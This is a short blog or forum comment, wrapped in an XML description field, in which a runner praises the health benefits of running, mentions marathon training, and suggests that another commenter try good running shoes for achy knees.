		<description>Great tips for running. I can't begin to tell you how beneficial running &amp; jogging is for me. I am currently in training for a marathon (which will probably turn into a half-marathon) and I have found that there are many other health-benefits from running. 

@sterling - Try getting a new pair of shoes. I also get achy knees, and switching to a GOOD pair of running shoes helped alot.</description>
